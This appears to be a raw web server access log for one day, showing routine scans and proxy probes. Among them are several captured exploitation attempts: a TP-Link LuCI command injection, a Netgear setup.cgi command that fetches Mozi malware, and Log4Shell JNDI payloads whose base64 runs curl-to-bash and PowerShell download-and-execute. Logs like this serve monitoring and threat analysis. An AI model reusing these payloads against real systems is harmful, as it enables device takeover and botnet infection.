179.43.167.219 - - [09/Jun/2024:01:42:21 +0200] "-" 400 1930
176.97.210.227 - - [09/Jun/2024:01:59:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.191.127.212 - - [09/Jun/2024:02:06:41 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:02:34:26 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [09/Jun/2024:03:05:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.191.127.212 - - [09/Jun/2024:03:24:56 +0200] "GET / HTTP/1.1" 200 1895
147.185.133.157 - - [09/Jun/2024:03:25:08 +0200] "GET / HTTP/1.1" 200 1895
179.60.147.13 - - [09/Jun/2024:03:39:36 +0200] "-" 400 1930
103.252.136.86 - - [09/Jun/2024:04:12:33 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
87.121.69.27 - - [09/Jun/2024:04:51:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
65.49.1.67 - - [09/Jun/2024:04:51:17 +0200] "-" 400 1930
176.97.210.227 - - [09/Jun/2024:05:05:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
206.168.32.99 - - [09/Jun/2024:05:06:32 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.99 - - [09/Jun/2024:05:06:35 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.99 - - [09/Jun/2024:05:06:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729
87.121.69.52 - - [09/Jun/2024:05:13:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.191.127.212 - - [09/Jun/2024:05:15:31 +0200] "GET / HTTP/1.1" 200 1895
179.60.147.13 - - [09/Jun/2024:06:02:36 +0200] "-" 400 1930
185.191.127.212 - - [09/Jun/2024:06:09:38 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [09/Jun/2024:06:29:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
35.87.0.78 - - [09/Jun/2024:06:35:39 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:06:58:50 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [09/Jun/2024:07:50:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
194.59.31.99 - - [09/Jun/2024:07:58:37 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
176.97.210.227 - - [09/Jun/2024:08:13:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.191.127.212 - - [09/Jun/2024:08:17:20 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:08:51:51 +0200] "GET / HTTP/1.1" 200 1895
216.218.206.108 - - [09/Jun/2024:09:16:05 +0200] "GET / HTTP/1.1" 200 1895
216.218.206.68 - - [09/Jun/2024:09:16:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729
216.218.206.104 - - [09/Jun/2024:09:17:11 +0200] "GET /?format=json HTTP/1.1" 200 1895
216.218.206.76 - - [09/Jun/2024:09:17:36 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
198.235.24.113 - - [09/Jun/2024:09:23:54 +0200] "GET / HTTP/1.0" 200 1895
185.191.126.213 - - [09/Jun/2024:09:49:52 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [09/Jun/2024:10:06:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
147.185.132.118 - - [09/Jun/2024:10:15:25 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:10:20:39 +0200] "GET / HTTP/1.1" 200 1895
123.175.198.152 - - [09/Jun/2024:10:45:46 +0200] "GET / HTTP/1.1" 200 1895
123.175.198.152 - - [09/Jun/2024:10:45:48 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740
123.175.198.152 - - [09/Jun/2024:10:45:48 +0200] "-" 400 1930
194.169.175.33 - - [09/Jun/2024:10:59:55 +0200] "-" 400 1930
87.121.69.52 - - [09/Jun/2024:11:06:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.191.127.212 - - [09/Jun/2024:11:09:52 +0200] "GET / HTTP/1.1" 200 1895
221.118.241.6 - - [09/Jun/2024:11:13:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
185.191.127.212 - - [09/Jun/2024:11:32:00 +0200] "GET / HTTP/1.1" 200 1895
64.112.72.222 - - [09/Jun/2024:11:40:42 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
206.189.158.249 - - [09/Jun/2024:11:58:21 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804
94.156.71.233 - - [09/Jun/2024:12:18:23 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804
87.121.69.27 - - [09/Jun/2024:12:34:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
180.144.61.13 - - [09/Jun/2024:12:40:15 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
185.191.127.212 - - [09/Jun/2024:12:56:57 +0200] "GET / HTTP/1.1" 200 1895
35.205.205.158 - - [09/Jun/2024:13:01:15 +0200] "GET / HTTP/1.1" 200 1895
188.166.70.97 - - [09/Jun/2024:13:18:11 +0200] "-" 400 1930
188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "-" 400 1930
188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "GET / HTTP/1.1" 200 1895
188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "-" 400 1930
45.227.254.49 - - [09/Jun/2024:13:21:11 +0200] "-" 400 1930
160.153.245.83 - - [09/Jun/2024:13:22:01 +0200] "POST /?username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D&password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D HTTP/1.1" 200 1895
160.153.245.83 - - [09/Jun/2024:13:22:06 +0200] "POST /?username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D&password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D HTTP/1.1" 200 1895
206.168.32.96 - - [09/Jun/2024:13:33:06 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.96 - - [09/Jun/2024:13:33:09 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.96 - - [09/Jun/2024:13:33:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729
185.191.127.212 - - [09/Jun/2024:13:39:11 +0200] "GET / HTTP/1.1" 200 1895
51.12.208.9 - - [09/Jun/2024:14:09:30 +0200] "GET / HTTP/1.1" 200 1895
171.5.160.141 - - [09/Jun/2024:14:11:04 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [09/Jun/2024:14:20:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
176.97.210.227 - - [09/Jun/2024:14:30:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.191.127.212 - - [09/Jun/2024:14:33:20 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:15:55:46 +0200] "GET / HTTP/1.1" 200 1895
93.56.205.95 - - [09/Jun/2024:15:59:43 +0200] "GET / HTTP/1.0" 200 1895
78.108.177.52 - - [09/Jun/2024:16:06:58 +0200] "GET / HTTP/1.0" 200 1895
185.191.127.212 - - [09/Jun/2024:16:16:43 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.52 - - [09/Jun/2024:16:45:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.180.140.5 - - [09/Jun/2024:16:55:10 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:17:23:09 +0200] "GET / HTTP/1.1" 200 1895
45.132.93.170 - - [09/Jun/2024:17:25:47 +0200] "GET / HTTP/1.1" 200 1895
152.32.245.170 - - [09/Jun/2024:17:31:40 +0200] "-" 400 1930
152.32.245.170 - - [09/Jun/2024:17:31:51 +0200] "GET / HTTP/1.1" 200 1895
152.32.245.170 - - [09/Jun/2024:17:32:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729
152.32.245.170 - - [09/Jun/2024:17:32:10 +0200] "GET /robots.txt HTTP/1.1" 404 728
152.32.245.170 - - [09/Jun/2024:17:32:11 +0200] "GET /sitemap.xml HTTP/1.1" 404 729
206.217.128.98 - - [09/Jun/2024:17:40:06 +0200] "GET / HTTP/1.1" 200 1895
141.98.11.15 - - [09/Jun/2024:18:03:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
172.169.2.65 - - [09/Jun/2024:18:04:56 +0200] "GET /actuator/health HTTP/1.1" 404 737
87.121.69.27 - - [09/Jun/2024:18:12:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.191.127.212 - - [09/Jun/2024:18:52:34 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.105 - - [09/Jun/2024:19:03:11 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.105 - - [09/Jun/2024:19:03:14 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.105 - - [09/Jun/2024:19:03:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729
45.141.86.171 - - [09/Jun/2024:19:06:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
117.222.124.58 - - [09/Jun/2024:19:08:23 +0200] "GET / HTTP/1.1" 200 1895
94.156.71.225 - - [09/Jun/2024:19:20:08 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804
176.97.210.227 - - [09/Jun/2024:19:36:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.191.127.212 - - [09/Jun/2024:19:41:01 +0200] "GET / HTTP/1.1" 200 1895
104.168.70.165 - - [09/Jun/2024:19:54:52 +0200] "GET / HTTP/1.1" 200 1895
192.241.216.46 - - [09/Jun/2024:20:02:57 +0200] "-" 400 1930
205.210.31.17 - - [09/Jun/2024:20:16:01 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:20:40:05 +0200] "GET / HTTP/1.1" 200 1895
103.252.136.86 - - [09/Jun/2024:20:46:12 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "-" 400 1930
139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "-" 400 1930
139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "GET / HTTP/1.1" 200 1895
139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "-" 400 1930
198.235.24.197 - - [09/Jun/2024:20:57:43 +0200] "GET / HTTP/1.0" 200 1895
87.121.69.27 - - [09/Jun/2024:21:54:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.236.176.211 - - [09/Jun/2024:22:00:30 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:22:00:32 +0200] "GET / HTTP/1.1" 200 1895
176.36.148.87 - - [09/Jun/2024:22:06:52 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://176.36.148.87:32958/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 727
160.176.199.90 - - [09/Jun/2024:22:07:55 +0200] "GET / HTTP/1.0" 200 1895
165.154.138.33 - - [09/Jun/2024:22:09:16 +0200] "-" 400 1930
165.154.138.33 - - [09/Jun/2024:22:09:26 +0200] "GET / HTTP/1.1" 200 1895
165.154.138.33 - - [09/Jun/2024:22:09:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729
165.154.138.33 - - [09/Jun/2024:22:09:45 +0200] "GET /robots.txt HTTP/1.1" 404 728
165.154.138.33 - - [09/Jun/2024:22:09:46 +0200] "GET /sitemap.xml HTTP/1.1" 404 729
160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET /nmaplowercheck1717963833 HTTP/1.1" 404 742
160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "POST /sdk HTTP/1.1" 404 721
160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET / HTTP/1.0" 200 1895
160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET /HNAP1 HTTP/1.1" 404 723
160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET /evox/about HTTP/1.1" 404 732
160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET / HTTP/1.1" 200 1895
160.176.199.90 - - [09/Jun/2024:22:10:54 +0200] "GET / HTTP/1.0" 200 1895
160.176.199.90 - - [09/Jun/2024:22:10:54 +0200] "GET / HTTP/1.1" 200 1895
185.191.127.212 - - [09/Jun/2024:22:48:01 +0200] "GET / HTTP/1.1" 200 1895
141.98.11.15 - - [09/Jun/2024:22:50:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.121.69.52 - - [09/Jun/2024:23:10:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.191.127.212 - - [09/Jun/2024:23:24:20 +0200] "GET / HTTP/1.1" 200 1895